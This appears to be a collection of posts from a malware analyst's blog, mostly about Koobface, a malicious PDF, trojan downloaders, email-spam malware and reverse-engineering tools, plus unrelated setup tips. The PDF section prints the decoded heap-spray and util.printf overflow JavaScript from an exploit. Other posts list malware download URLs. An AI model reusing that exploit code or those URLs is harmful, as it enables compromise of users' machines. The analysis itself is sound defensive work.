Koobface

I've traced and analyzed some variants of the infamous KoobFace worm, but I've seen this analysis from ThreatExpert pretty complete:

http://blog.threatexpert.com/2008/12/koobface-leaves-victims-black-spot.html

http://blog.threatexpert.com/2008/12/how-to-defeat-koobface.html

simple pdf exploit analysis

simple steps in checking pdf for exploit:
1. open the file in hex viewer or any text editor/viewer. if the pdf has embedded script which is compressed, it can be checked by the FlateDecode string:

3. use pdftk tool to uncompress the malicious script:

$ pdftk file.pdf output file.pdf.out uncompress

4. the file file.pdf.out now contains the decompressed script. browse the file to locate the (escaped) script:

5. extract the escaped text, and feed to your preferred tool to unescape the code.
Extracted text:
%76%61%72%20%73%63%63%73%20%3D%20%75%6E%65%73%63%61%70%65%28%74%68%69%73%2E%67%65%74%46%69%65%6C%64%28%27%74%65%78%74%27%29%2E%76%61%6C%75%65%29%3B%0D%0A%0D%0A%09%76%61%72%20%62%67%62%6C%20%3D%20%75%6E%65%73%63%61%70%65%28%22%25%75%30%41%30%41%22%2B%22%25%75%30%41%30%41%22%29%3B%0D%0A%09%76%61%72%20%73%6C%73%70%63%20%3D%20%32%30%20%2B%20%73%63%63%73%2E%6C%65%6E%67%74%68%3B%0D%0A%09%77%68%69%6C%65%28%62%67%62%6C%2E%6C%65%6E%67%74%68%20%3C%20%73%6C%73%70%63%29%20%62%67%62%6C%20%2B%3D%20%62%67%62%6C%3B%0D%0A%09%76%61%72%20%66%62%6C%6B%20%3D%20%62%67%62%6C%2E%73%75%62%73%74%72%69%6E%67%28%30%2C%73%6C%73%70%63%29%3B%0D%0A%09%76%61%72%20%62%6C%6B%20%3D%20%62%67%62%6C%2E%73%75%62%73%74%72%69%6E%67%28%30%2C%62%67%62%6C%2E%6C%65%6E%67%74%68%20%2D%20%73%6C%73%70%63%29%3B%0D%0A%09%77%68%69%6C%65%28%62%6C%6B%2E%6C%65%6E%67%74%68%20%2B%20%73%6C%73%70%63%20%3C%20%30%78%36%30%30%30%30%29%20%62%6C%6B%20%3D%20%62%6C%6B%20%2B%20%62%6C%6B%20%2B%20%66%62%6C%6B%3B%0D%0A%0D%0A%09%76%61%72%20%6D%6D%79%20%3D%20%6E%65%77%20%41%72%72%61%79%28%29%3B%0D%0A%09%66%6F%72%28%69%20%3D%20%30%3B%20%69%20%3C%20%31%32%30%30%3B%20%69%2B%2B%29%7B%20%6D%6D%79%5B%69%5D%20%3D%20%62%6C%6B%20%2B%20%73%63%63%73%20%7D%0D%0A%0D%0A%76%61%72%20%6E%6D%20%3D%20%31%32%3B%0D%0A%66%6F%72%28%69%3D%30%3B%69%3C%31%38%3B%69%2B%2B%29%7B%20%6E%6D%20%3D%20%6E%6D%20%2B%20%22%39%22%3B%20%7D%0D%0A%66%6F%72%28%69%3D%30%3B%69%3C%32%37%36%3B%69%2B%2B%29%7B%20%6E%6D%20%3D%20%6E%6D%20%2B%20%22%38%22%3B%20%7D%0D%0A%0D%0A%75%74%69%6C%2E%70%72%69%6E%74%66%28%75%6E%65%73%63%61%70%65%28%22%22%2B%22%25%22%2B%22%32%35%25%33%34%25%22%2B%22%33%35%25%33%30%25%33%30%25%33%30%25%36%36%22%29%2C%20%6E%6D%29%3B%0D%0A%0D%0A%74%68%69%73%2E%63%6C%6F%73%65%44%6F%63%28%74%72%75%65%29%3B%0D%0A5.

the output will be decoded as below.
<------------------------------------------------------------------------------
var sccs = unescape(this.getField('text').value);
var bgbl = unescape("%u0A0A"+"%u0A0A");
var slspc = 20 + sccs.length;
while(bgbl.length < slspc) bgbl += bgbl;
var fblk = bgbl.substring(0,slspc);
var blk = bgbl.substring(0,bgbl.length - slspc);
while(blk.length + slspc < 0x60000) blk = blk + blk + fblk;
var mmy = new Array();
for(i = 0; i < 1200; i++){ mmy[i] = blk + sccs }
var nm = 12;
for(i=0;i<18;i++){ nm = nm + "9"; }
for(i=0;i<276;i++){ nm = nm + "8"; }
util.printf(unescape(""+"%"+"25%34%"+"35%30%30%30%66"), nm);
this.closeDoc(true);
<------------------------------------------------------------------------------

if you're monitoring latest alerts, it will be familiar with you. its an exploit for PDF's util.printf discovered by coresecurity. see the details: http://www.coresecurity.com/content/adobe-reader-buffer-overflow

Real AV ?!?

Hmmm..Real Antivirus? or just another rouge AV...

quick check of trojan's downloaded file

Some bots and trojans are using simple encryption to download other component. When you trace malware, you might see some url to be downloaded, but when you manually fetch it, its nothing by a gibberish data. First they download a relatively small file say, ff.rar, from malicious web hosting site. The file is not actually a RAR achive but contains data that looks encrypted. But when try to decrypt it, the file may contain the actual link of the malicious file or component to be downloaded by the malware.

Example: ff.rar
00000000: 29 1A 61 35-63 64 65 74-2E 61 00 00-00 00 00 00 )?a5cdet.a
00000010: 00 00 00 00-00 00 00 00-00 00 00 00-00 00 00 00
00000020: 00 00 41 5D-5D 59 13 06-06 48 5A 4D-1F 5C 07 4A A]]Y???HZM?\•J
00000030: 46 44 06 43-43 06 4F 4F-07 4C 51 4C- FD?CC?OO•LQL

Your instinct will tell you that this could be the download URL, and that must be using http.
At offset 0x23 and 0x24 are the same bytes (5D) which could be decrypted to 'TT' of 'http'.
Hmm..applying simple math, 5d ^ X = 74 (74 is the hex value for 't'), so x = 29. Now lets try to decrypt it using that value as the key.

Using hiew, you can quickly decrypt the bytes using the value X=29 as the key
1. Open the file in hiew, hex mode. Position the cursor at offset 0
2. Press F3 (edit), then F8 (XOR). Put 29 hex as the XOR mask. Enter.
3. Pressing F8 will decrypt it similar below:

00000000: 00 33 48 1C-4A 4D 4C 5D-07 48 29 29-29 29 29 29 3H?JML]•H))))))
00000010: 29 29 29 29-29 29 29 29-29 29 29 29-29 29 29 29 ))))))))))))))))
00000020: 29 29 68 74-74 70 3A 2F-2F 61 73 64-36 75 2E 63 ))http://asd6u.c
00000030: 6F 6D 2F 6A-6A 2F 66 66-2E 65 78 65- om/jj/ff.exe

Now you have the actual link of the malware and you can manually wget it from the link hXXp://asd6u.com/jj/ff.exe

Reverse Engineering Links

Gathered from different sources (eg. my own bookmarks, forum, blog, etc):

http://www.openrce.org
http://woodmann.net/collaborative/tools/index.php/Category:Hardware_Reversing_Tools
http://www.woodmann.com/crackz/index.html
http://www.woodmann.com/forum/index.php
http://www.codebreakers-journal.com/
http://www.tuts4you.com/download.php?list.17
http://www.tuts4you.com/
http://www.exetools.com/
http://ap0x.jezgra.net/
http://www.crackmes.de/
http://www.reverse-engineering.info/
http://www.w00zl3.net/
http://korupt.wordpress.com/
http://www.reteam.org/
http://www.reconstructer.org
http://www.antirootkit.com
http://www.rootkit.com
http://evilcry.netsons.org
http://evilcodecave.wordpress.com
http://offensivecomputing.net/
http://zairon.wordpress.com/
http://www.ivanlef0u.tuxfamily.org/
http://arteam.accessroot.com/
http://uninformed.org/
http://dvlabs.tippingpoint.com/
http://www.matasano.com/log/category/reversing/
http://reversengineering.wordpress.com/
http://indefinitestudies.wordpress.com/2008/09/25/automatic-unpacking/
http://www.quequero.org/Reversing
http://www.codeproject.com/KB/cpp/funccaller.aspx
http://www.datarescue.com/laboratory/
http://www.nynaeve.net
http://www.datasecurity-event.com/downloads.html
http://xchg.info/ARTeam/Tutorials/
http://www.reverse-engineering.net/
http://www.reversing.be/

Others:
http://www.intel.com/products/processor/manuals/

VS2005 compiled exe error

The following error shows when you transferred or copied your VS2005 compiled program to other machine. This is I think

c:\test> BlueFish.exe
This application has failed to start because the application configuration is incorrect. Reinstalling the application may fix this problem.

Similar problem discussion about SxS (side-by-side) issue can be found here.
Another similar discussion I found from this link.

Anyway, I tried changing settings in my VS2005 which just worked fine, but not sure if its the correct solution. Here;s the settings as screenshots:

opensource flash

http://osflash.org

BGP security hole

after the noisy DNS vulnerability, here comes another big time security loophole that can take down the internet in less than an hour, or used in malicious way such as eavesdropping - the BGP weakness.

Tip Of The Day - Virtual Drive

"OnLineGames" trojans are one of todays most popular malware, occupying large chunk of ItW( In-The-Wild) list. Note: Some malware, like Autorun are also behaving similar to OnlineGames trojan. They are designed to steal confidential information from online gamers particularly addicted to massively multiplayer online role-playing game (MMORPG) types of games.
One particular behavior of this malware family is its capability to spread to all hard drives including USB. This made it possible for this malware to be carried out somewhere including outer space . Its just a matter of time that someone could write virus that could sabotage some of the most critical infrastractures that affect our lives. Scary isn't it?

Typically, we do static analysis with Hiew or Ida. Then dynamic analysis to analyze viruses. Static analysis is basically just browsing the structures of the file, disassembly codes and trying to understand the overall behavior. Some strings can also give help of its nature, like my previous post.
Dynamic analysis can be divided into 2 parts: (a) behavioral analysis by running the malware in a sanbox.
and (b) tracing, running the malware under the debugger, watching the behavior by breaking to some predetermined
part of the code, and supplementing other additional "baits" (eg. required files, proces, etc). In tracing mode, you have the choice to examine only parts of the code.
Example: how the malware gather email address for spamming, some decryption routines, and other algorithmic code that may require special attention to fully understand the malware, or other code that you need to verify because other analysis say something that you didnot observe.

Ill show some practical tips that can help you in analyzing (malware in general and ) OnlineGames trojan through behavioral analysis, that I can roughly describe as follows:

0. Most of them are working fine on VMware, so using VMware is a good idea to analyze malware, especially if you analyze large volume of malware due to VMwar's snapshot capabilities. Reverting to your "sandbox" snapshot is way much faster than restoring real machine by using, say GHOST.

1. Use lightweight network/packet sniffer to capture the traffic as most of them are downloading components from remote locations. Im using my own tool pcaps32:

pcaps32 in action

This is particularly useful to check the inbound/outbound traffic generated by the malware such as communication with its C&C, download websites, spammed emails, traffic redirection or if the contacted IP is unreachable or not.

2. Process viewer program like process explorer sysinternals, to see process activities like hiddenly spawned ie process, etc. Pretty obvious.

3. Registry and file monitoring programs are obviously valuable to easily spot the modification in the system after running the malware.


4. And last but not the least, Virtual Hard drive, thats why the subject name :) As virus analyst, you have to be quick and resourceful in utilizing the right tools. One time, while analyzing "OnlineGames" trojan, I thought I've whether its mutating for very infection. Onlinegames are known to drop INF file and a copy of itself (or other components) to all accessible hard drives. So the trick is to provide the trojan more accessible hard drives to see other behavior to some extent. This is essential for us to know if the dropped files to other hard drives are mutating or polymorphic. But my VMware setup has only one drive and I didnt want to resetup just for this malware.

For this purpose, I tried Virtual Hard Drive software from farstone. So grab a trial version and install it to your sandbox machine. Creating a virtual hard drive is easy. Just run "Virtual Hard Drive Pro" from Start->Programs->Virtual Hard Drive Pro. A wizard will guide you to create virtual hard drive:



Just specify the drive letter for your new hard drive and the allocated space for it. The licensed version I believe would allow you to create more virtual hard drives.
Now you are ready to run the malware. This is where the behavioral analysis commence.

OK. Lets say youre done with the analysis, and would like to check the effect of the virtual hard drive (VHD). Just goto your bait hard drive and check for system modification, which is usually dropped or copy of the malicious program. Take note that some monitoring program will not be able to catch added programs to the VHD, so will manually check it.
Some variants may turn off the "show hidden file" option via registry, but you can use "dir /ah" or "attrib *" if you know the drop point, usually at the root dir similar below:


It will help the analyst to verify if the malware is polymorphic or mutating on every infection, and so the analyst can provide better signature coverage against each variant or family.

On my next posts, I will present how to analyze complex malware that would require tracing and hacking the malware code. Stay tuned.

Tip Of The Day - AutoHotkey malware

Yesterday, I found a piece of malware to analyze. I checked the file structure and it looks like a UPX packed executable (eg. from section names, entry point disassembly and even some signature checker tools).

Original file

Unpacked version


UPX v3.0 marker

So I grabbed a copy of upx.exe that can decompress the file which says its UPX version 3.00. Everything was ok and the file was successfully unpacked. So I opened the unpacked version to HIEW and check the entry point again.

Entry point disassembly in Hiew

Entry point disassembly in Ida

From its disassembly, it really is unpacked and you can tell that it looks the normal entry point of a program. Maybe if you're analyzing malware for a while, you can tell this based from the first API calls, etc. Most of the time its game over..but sometimes, it gets even more.

So I ran the file on my sandbox machine and wait for some interesting behavior. But nothing happened. So I opened it again and started to trace. But hey, I forgot to check the strings that can lead me somewhere. I've browsed the binary under Hiew and started looking for some strings.

"AutoHotkey" strings

Indeed, there were some interesting strings (Assembly Manifest) inside the binary.
With that in mind, its most likely an autohotkey script that is converted into executable, just like autoit, remember? Hmmm...so I opened my browser and search for "autohotkey". Viola! From its website it says:

"Convert any script into an EXE file that can be run on computers that don't have AutoHotkey installed."

The EXE is actually a hyperlink to download its decompiler ahk2exe. Download it and you can revert back the exe to its original script format, that can be opened on any text viewer/editor to view the contents. The decompiled script is pretty much straightforward and it would make your life 10x faster to analyze the file.
Then thats game over!

Decompiled script

Check the AV detections in VT

Conclusion: People can now easily create malware without learning ASM or C by just learning simple syntax from scripting languages like autohotkey then convert it into executable format.

Judy Array

Hmm...Ive found this code interesting..I can use it in some of my coding adventures :)

More Paris Hilton Malware..

My inbox has several emails purportedly a video of Paris Hilton.
The email is a simple html that contains link to a photo (Paris), but when you click the hyperlink enticing the users to view the video, it will download an EXE file from another remote location.


An example of the email is below:

And the email body in text mode is similar below:
Highlighted in red is the actual location of the executable file. You can see the links of the photo is different from the location of the binary file.

Some of the download links are as follows:
http://patuash.yoyo.pl/video_4.exe
http://www.odakoptik.com.tr/video_3.exe
http://baupol.net/video_1.exe


Example output from VT is here.

IE7 update is now Paris Hilton video

The fake IE7 who actively circulated a couple of weeks ago is back. This time, it disguises as video of no other than the favorite celebrity by malware authors - Paris Hilton.

hexdump codes for python

http://hex-dump.blogspot.com/2006/02/hex-dump-tools-written-in-python.html

Sandbox & Virtualization & Lockdown Technologies

http://www.offensivecomputing.net/?q=node/569

good read

http://bitblaze.cs.berkeley.edu/

Traditional sig-based AV is dead

Maybe not (yet)..but its worth to mention that some AVs are starting to give up the traditional way of virus scanning and moving towards "cloud-based" threat scanning:

First, TMI's Smart Protection:
- http://trendmicro.mediaroom.com/index.php?s=43&item=642

Then, Panda has the so called Collective Intelligence approach:
- http://research.pandasecurity.com/blogs/images/wp_pb_collective_intelligence.pdf

And just recently, even academic sector also believes to the "in-the-cloud" strategy:
- http://blogs.zdnet.com/emergingtech/?p=1008

I wont be surprised if other vendors would follow the steps :-)

Latest IE7 version is nothing but a malware

The message body runs as below:

-----------------------------------------------------------------------------------------------
Download the latest version Internet Explorer 7.0! About this mailing:
You are receiving this e-mail because you subscribed to MSN Featured Offers. Microsoft respects your privacy. If you do not wish to receive this MSN Featured Offers e-mail, please click the "Unsubscribe" link below. This will not unsubscribe you from e-mail communications from third-party advertisers that may appear in MSN Feature Offers. This shall not constitute an offer by MSN. MSN shall not be responsible or liable for the advertisers' content nor any of the goods or service advertised. Prices and item availability subject to change without notice.

�2008 Microsoft | Unsubscribe | More Newsletters | Privacy

Microsoft Corporation, One Microsoft Way, Redmond, WA 98052
-----------------------------------------------------------------------------------------------


Warning: Dont click the link above; it will download a malware, that even AV vendors are confused how they gonna name it :) See: http://www.virustotal.com/analisis/18b97fb3bc30251051a8542a90401b6f

AV's have good coverage though for this piece of malware :-)

Christina Aguilera Interesting video

Video of Christina Aguilera is currently being spammed by some malware.
Dont temp to download if you dont like to be infected :-)

The mail looks like below:


When you click the link, it will go to a website that will download the file videoXXX67h8.exe (72,704 bytes). Virustotal shows several AV vendors detecting it as malicious: http://www.virustotal.com/analisis/fa5924ec4f51bc1c16a83b280756b3da

You can ofcourse check the header to manually search and download the malware from the link in the screenshot:

Canadian Pharmacy scam has resurfaced, and shifted its spam strategy. The Canadian Pharmacy had been very active in the past. Its new strategy, though not new in spam world, is to compose emails with long message body, then inserts a hyperlink somewhere in any part of the email content. I've observed some spam emails from this botnet-operated pharmacy that slips from the spam filtering software, but it wont take that lonf for sure.

Figure 1 is an example of the spam mail. The message may look legit, but when you read it's content, its nothing but random words or phrases.The link to the canadian pharmacy wbsite is inserted as a small hyperlink, and when you view the included image, Figure 2 will be revealed. Familiar?

Figure 1. Canadian Pharmacy Spam mail

Figure 2. Loaded image

If you're still in doubt, try to click the image area which will redirect you to the actual canadian pharmacy website (See Figure 3)

Figure 3. Canadian Pharmacy website

OpenPacket.org

This looks pretty helpful when you deal with network/packet research:
Check: https://www.openpacket.org/

Angelina is in your (Spam) mailbox!

While most of us simply ignoring the spam mailbox, sometimes its a good idea to check them once in a while. But be ready as viruses mostly are lurking in your spammed mails.
So always wear some protection - use sandboxie while browser. It's not 100% malware proof but most of the time its enough layer of protection against web based exploits and malware.

I will be using my gmail account for demonstration.

1. Browse the Spam folder and slect anything cathces your interest.
2. Spams range from medicines, watches, and of course porn.

3. Hmmm..look at that subject above (highlighted in red):
"Angelina Jolie naked - WATCH". Isnt it interesting??

4. Google is so security conscious. By default, the objects that may contain malicious code, eg. graphics files, are not displayed by default. OK lets open it! Woaah!
5. As you can see, there is a watch link thats waiting for you to click if you wanna see more of Angelina!

6. But be cautious! This is the most common strategy of malware author spamming their malicious programs (or virus) to unsoliciting recipients.

Tip. You can check the SMTP header and the html code to see any malicious objects, like links to executable files or other javascripts. You can do it by clicking the small rectangular button in the picture below:

Clicking the "Show original" will show you the SMTP header and the HTML inside the mail as similar below:

7. Gotcha! You next step now is to manually download the exe file and send it to AV vendors if you can't analyze it by yourself. Or send it to online sandboxing services like Anubis (my favorite), Norman, CWsandbox, and free virus scanning Virustotal or virusscan.

Tamarin

http://hecker.org/mozilla/adobe-mozilla-and-tamarin

Security tools/RCE tools

Thanks to people for maintaining the ff links. Very helpful in our field.

Security Tools:
http://securitytools.wikidot.com/

RCE Tools:
http://www.woodmann.com/collaborative/tools/index.php/Category:RCE_Tools

Google hacking could lead to Zlob infection!

Link:http://www.fortiguardcenter.com/analysis/googlehackzlob.html

Hello World v0.2!

Its time to facelift this blogsite and be more active =P
This was my previous personal online notepad, but thanks to Google for its online notepad so I wont need this anymore. Instead, I will convert this into MALWARE, SECURITY and REVERSE ENGINEERING blogsite!!!
Stay tuned! lolz!!

How to detect version of MS Visual Studio or compiler in compilation time?

To do this you should use _MSC_VER define like in this code:
#if _MSC_VER >= 1400 // this is Visual C++ 2005
#elif _MSC_VER >= 1310 // this is Visual C++ .NET 2003
#elif _MSC_VER > 1300 // this is Visual C++ .NET 2002

KDE4 Problem ?

I experienced a problem with Kubuntu.

I couldn't login to the X window, and even manually starting the X window after logging in via console, sometimes doesn't work. Well, (un)fortunately, I'm not the only one experiencing this problem. Thanks to this link and it solves my problem: http://ubuntuforums.org/showthread.php?p=4320584

So if you think we have the same problem, open the file 'xsession-errors' at your home directory with any text editor (vi/vim/etc) or commands like tail,less,etc:

~$ tail -20 ~/.xsession-errors

And look at the end of the file for something similar below:
:
kdecore (KLocale): WARNING: Definition of PluralForm is none of NoPlural/TwoForms/French/OneTwoRest/Russian/Polish/ Slovenian/Lithuanian/Czech/Slovak/Arabic/Balcan/Ma cedonian/Gaeilge/Maltese: Definition of PluralForm - to be set by the translator of kdelibs.po
:

This is a language pack problem. So removing the following will fix the problem (atleast for me).

~$ sudo aptitude remove language-pack-kde-en
~$ sudo aptitude remove language-pack-kde-en-base

PHP/Obfu.A

http://pastebin.com/fbccb9f2
http://www.ecks90.com/?id=42

Obfuscated python

http://www.p-nand-q.com/python/obfuscated_python.html

portbunny is out!

another port scanner, written in C, wrapped in python
check this out! http://www.recurity-labs.com/portbunny/portbunny.html

ClamAV setup

Download location (HTTP):

http://www.clamav.net/

Installation of Clamav

First is to add a dedicated group and user for the clamav daemons and
environment.

groupadd -g 40 clamav
useradd -c "CLAMAV Owner" -m -d /var/lib/clamav -g clamav -u 40 -s
/bin/bash clamav

Notes
. all the others daemons (clamsmtpd and freshclam) and scripts will be
running under the same account: clamav.
This account needs a valid shell and home directory for executing a
shell-script when a virus is found.
. the number 40 for the groupidnr and useridnr is arbitraty. You can
choose one suitable for you.

With the new account create an environment:

cd /var/lib/clamav
mkdir {bin,db,log,run,template,tmp}
chown -R clamav:clamav /var/lib/clamav
chmod 700 /var/lib/clamav

Configuring, compiling and installing the software. Note I use a one
directory: /var/lib/clamav.

./configure --prefix=/usr \
--sysconfdir=/etc \
--localstatdir=/var \
--libexecdir=/usr/sbin \
--disable-clamuko \
--with-user=clamav \
--with-group=clamav \
--with-dbdir=/var/lib/clamav/db
make
make install

Clamd, clamscan, clamdscan and freshclam are all part of this package.
I only use clamd and freshclam.
The daemons clamd and freshclam are installed in /usr/sbin, and the
configurationfiles clamav.conf and freshclam.conf are in /etc.
A database with signatures of virusses is installed in
/var/lib/clamav/db, which is an old version. It will be updated as soon
as the freshclam daemon is running.

Configuration of Clamav

The configurationfile of the clamd-daemon is /etc/clamd.conf. The
settings I use are:
(only the most important are shown)

# Example
LogFile /var/lib/clamav/log/clamd.log
#LogFileUnlock
LogTime
LogSyslog
#PidFile

TemporaryDirectory /var/lib/clamav/tmp
DatabaseDirectory /var/lib/clamav/db
LocalSocket /var/lib/clamav/run/clamd.sock
FixStaleSocket
#TCPSocket

User Clamav

ScanPE
ScanOLE2
ScanMail
ScanHTML
#ScanArchive
ScanRAR